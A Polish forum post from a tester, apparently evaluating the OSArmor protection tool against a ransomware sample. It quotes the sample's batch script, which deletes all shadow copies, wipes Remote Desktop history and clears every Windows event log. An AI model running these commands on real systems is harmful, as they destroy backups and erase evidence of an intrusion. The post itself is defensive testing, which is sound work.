23.12.2017, 12:26
Hi
Akurat na tym konkretnym ransomie nie mogę tego sprawdzić, bo chociaż wykonuje ransom po kodowaniu odpowiednie komendy do usunięcia kopii cieniowych:
to poza nawet zainstalowanym OSArmor można pliki przywrócić, czyli robi to w sposób nie umiejętny.
Jak będę miał więcej czasu to sprawdzę ochronę kopii cieniowych przez program OSArmor, na konkretnych ransomach które wykonują to zadanie prawidłowo.
Akurat na tym konkretnym ransomie nie mogę tego sprawdzić, bo chociaż wykonuje ransom po kodowaniu odpowiednie komendy do usunięcia kopii cieniowych:
Kod:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
to poza nawet zainstalowanym OSArmor można pliki przywrócić, czyli robi to w sposób nie umiejętny.
Jak będę miał więcej czasu to sprawdzę ochronę kopii cieniowych przez program OSArmor, na konkretnych ransomach które wykonują to zadanie prawidłowo.